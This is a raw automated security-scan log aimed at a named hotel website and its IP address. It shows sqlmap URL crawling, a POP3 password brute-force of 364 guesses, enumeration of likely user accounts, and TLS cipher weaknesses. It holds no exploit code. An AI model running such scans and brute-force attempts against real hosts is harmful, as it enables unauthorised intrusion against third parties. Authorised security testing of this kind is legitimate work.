- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=11'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=12'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=13'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=17'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=18'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=21'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=22'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=23'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/habitaciones.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=11'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=12'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=13'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=17'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=18'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=21'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=22'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/servicios_detalle.php?pk_hotel_servicio=23'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Sol de Ica'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Presidente Ay B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Presidente A'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Presidente B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Pozo santo'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/solicitar.php?salon=Dunas'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=35&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=36&pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=1#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=2#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=3#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=4#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=5#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=6#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=7#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=8#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=9#Ancla'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/habitaciones.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion='
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/galeria.php?pk_media_categoria=39'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/habitaciones.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Sol de Ica'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente Ay B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente A'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Presidente B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Pozo santo'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/solicitar.php?salon=Dunas'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com:80/galeria.php?pk_media_categoria=39'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=64&pk_habitacion=1'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Sol de Ica'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente Ay B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente A'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Presidente B'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Pozo santo'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/solicitar.php?salon=Dunas'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=7'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=9'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes.php?pk_habitacion=8'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes.php?pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=75&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=33&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=34&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=46&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=3'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=4'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=5'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=6'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/galeria.php?pk_media_categoria=39'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=35&pk_habitacion=2'
- [13:40:55] [INFO] skipping 'http://www.lasdunashotel.com/en/paquetes-detalle.php?pk_paquete_especial=36&pk_habitacion=2'
- [13:40:55] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09292015_0133pm.csv'
- [*] shutting down at 13:40:55
- + -- --=[Port 110 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 13:40 EDT
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.00095s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 110/tcp open pop3 Dovecot pop3d
- | pop3-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 364 guesses in 617 seconds, average tps: 0
- |_pop3-capabilities: AUTH-RESP-CODE PIPELINING USER CAPA STLS SASL(PLAIN LOGIN) RESP-CODES UIDL TOP
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 619.27 seconds
- + -- --=[Port 111 closed... skipping.
- + -- --=[Port 135 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 13:51 EDT
- NSE: got no answers from pipelined queries
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.022s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
- |_http-csrf: Couldn't find any CSRF vulnerabilities.
- |_http-dombased-xss: Couldn't find any DOM based XSS.
- |_http-feed: Couldn't find any feeds.
- |_http-frontpage-login: false
- | http-headers:
- | Date: Tue, 29 Sep 2015 17:51:34 GMT
- | Server: Apache
- | Last-Modified: Sun, 20 Oct 2013 22:07:41 GMT
- | Accept-Ranges: bytes
- | Content-Length: 11812
- | Connection: close
- | Content-Type: text/html
- |
- |_ (Request type: HEAD)
- |_http-iis-webdav-vuln: ERROR: This web server is not supported.
- | http-referer-checker:
- | Spidering limited to: maxpagecount=30
- |_ http://code.jquery.com/jquery-1.9.1.js
- |_http-server-header: Apache
- |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
- | http-useragent-tester:
- |
- | Allowed User Agents:
- | Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)
- | libwww
- | lwp-trivial
- | libcurl-agent/1.0
- | PHP/
- | Python-urllib/2.5
- | GT::WWW
- | Snoopy
- | MFC_Tear_Sample
- | HTTP::Lite
- | PHPCrawl
- | URI::Fetch
- | Zend_Http_Client
- | http client
- | PECL::HTTP
- | Wget/1.13.4 (linux-gnu)
- | WWW-Mechanize/1.34
- |_
- |_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
- | ssl-cert: Subject: commonName=*.websitewelcome.com
- | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
- | Public Key type: rsa
- | Public Key bits: 2048
- | Signature Algorithm: sha256WithRSAEncryption
- | Not valid before: 2015-01-05T00:00:00
- | Not valid after: 2018-01-04T23:59:59
- | MD5: fff8 be59 dc8b d8fa b80b 075b a184 4491
- |_SHA-1: 05da b11f 290a 8e49 9c32 44dc d0b4 b334 e2b4 00f6
- |_ssl-date: 2015-09-29T17:51:29+00:00; -3s from scanner time.
- | ssl-enum-ciphers:
- | TLSv1.1:
- | ciphers:
- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 128) - B
- | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 128) - B
- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 128) - C
- | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A
- | TLS_DHE_RSA_WITH_SEED_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_SEED_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_IDEA_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (dh 256) - A
- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - A
- | compressors:
- | NULL
- | cipher preference: server
- | warnings:
- | Key exchange parameters of lower strength than certificate key
- | Weak cipher RC4 in TLSv1.1 or newer not needed for BEAST mitigation
- | TLSv1.2:
- | ciphers:
- | TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 (dh 128) - B
- | TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 (dh 128) - B
- | TLS_DHE_RSA_WITH_AES_256_CBC_SHA (dh 128) - B
- | TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA (dh 128) - B
- | TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 2048) - A
- | TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 2048) - A
- | TLS_RSA_WITH_AES_256_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_256_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (dh 256) - A
- | TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (dh 256) - A
- | TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (dh 128) - C
- | TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 (dh 128) - C
- | TLS_DHE_RSA_WITH_AES_128_CBC_SHA (dh 128) - C
- | TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 2048) - A
- | TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 2048) - A
- | TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_CAMELLIA_128_CBC_SHA (rsa 2048) - A
- | TLS_DHE_RSA_WITH_SEED_CBC_SHA (dh 128) - C
- | TLS_RSA_WITH_SEED_CBC_SHA (rsa 2048) - A
- | TLS_RSA_WITH_IDEA_CBC_SHA (rsa 2048) - A
- | TLS_ECDHE_RSA_WITH_RC4_128_SHA (dh 256) - A
- | TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - A
- | compressors:
- | NULL
- | cipher preference: server
- | warnings:
- | Key exchange parameters of lower strength than certificate key
- | Weak cipher RC4 in TLSv1.1 or newer not needed for BEAST mitigation
- |_ least strength: C
- | ssl-google-cert-catalog:
- |_ No DB entry
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 2059.30 seconds
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://www.lasdunashotel.com
- Traceback (most recent call last):
- File "/usr/bin/wafw00f", line 695, in <module>
- main()
- File "/usr/bin/wafw00f", line 665, in main
- if attacker.normalrequest() is None:
- File "/usr/bin/wafw00f", line 90, in normalrequest
- return self.request(usecache=usecache,cacheresponse=cacheresponse,headers=headers)
- File "/usr/share/waffit/libs/evillib.py", line 294, in request
- h.request(method,path,headers=headers)
- File "/usr/lib/python2.7/httplib.py", line 1001, in request
- self._send_request(method, url, body, headers)
- File "/usr/lib/python2.7/httplib.py", line 1035, in _send_request
- self.endheaders(body)
- File "/usr/lib/python2.7/httplib.py", line 997, in endheaders
- self._send_output(message_body)
- File "/usr/lib/python2.7/httplib.py", line 850, in _send_output
- self.send(msg)
- File "/usr/lib/python2.7/httplib.py", line 812, in send
- self.connect()
- File "/usr/lib/python2.7/httplib.py", line 1212, in connect
- server_hostname=server_hostname)
- File "/usr/lib/python2.7/ssl.py", line 350, in wrap_socket
- _context=self)
- File "/usr/lib/python2.7/ssl.py", line 566, in __init__
- self.do_handshake()
- File "/usr/lib/python2.7/ssl.py", line 796, in do_handshake
- match_hostname(self.getpeercert(), self.server_hostname)
- File "/usr/lib/python2.7/ssl.py", line 269, in match_hostname
- % (hostname, ', '.join(map(repr, dnsnames))))
- ssl.CertificateError: hostname 'www.lasdunashotel.com' doesn't match either of '*.websitewelcome.com', 'websitewelcome.com'
- https://www.lasdunashotel.com [302] Apache, Country[UNITED STATES][US], HTTPServer[Apache], IP[192.185.26.214], RedirectLocation[/404.html]
- https://www.lasdunashotel.com/404.html [200] Apache, Country[UNITED STATES][US], HTTPServer[Apache], IP[192.185.26.214], JQuery[1.9.1], Script[text/javascript], Title[404 - PAGE NOT FOUND]
- + -- --=[Checking if X-Content options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-Frame options are enabled on www.lasdunashotel.com...
- + -- --=[Checking if X-XSS-Protection header is enabled on www.lasdunashotel.com...
- + -- --=[Checking HTTP methods on www.lasdunashotel.com...
- + -- --=[Checking if TRACE method is enabled on www.lasdunashotel.com...
- + -- --=[Checking for open proxy on www.lasdunashotel.com...
- + -- --=[Enumerating software on www.lasdunashotel.com...
- Server: Apache
- + -- --=[Checking if Strict-Transport-Security is enabled on www.lasdunashotel.com...
- + -- --=[Checking for Flash cross-domain policy on www.lasdunashotel.com...
- + -- --=[Checking for Silverlight cross-domain policy on www.lasdunashotel.com...
- + -- --=[Checking for HTML5 cross-origin resource sharing on www.lasdunashotel.com...
- + -- --=[Retrieving robots.txt on www.lasdunashotel.com...
- + -- --=[Retrieving sitemap.xml on www.lasdunashotel.com...
- + -- --=[Checking cookie attributes on www.lasdunashotel.com...
- Version: 1.10.5-static
- OpenSSL 1.0.2e-dev xx XXX xxxx
- Testing SSL server www.lasdunashotel.com on port 443
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.0 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.2 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.0 256 bits AES256-SHA
- Accepted TLSv1.0 256 bits CAMELLIA256-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 128 bits SEED-SHA
- Accepted TLSv1.0 128 bits CAMELLIA128-SHA
- Accepted TLSv1.0 128 bits IDEA-CBC-SHA
- Accepted TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits RC4-SHA
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.1 256 bits AES256-SHA
- Accepted TLSv1.1 256 bits CAMELLIA256-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 128 bits SEED-SHA
- Accepted TLSv1.1 128 bits CAMELLIA128-SHA
- Accepted TLSv1.1 128 bits IDEA-CBC-SHA
- Accepted TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits RC4-SHA
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA
- Accepted TLSv1.2 256 bits CAMELLIA256-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
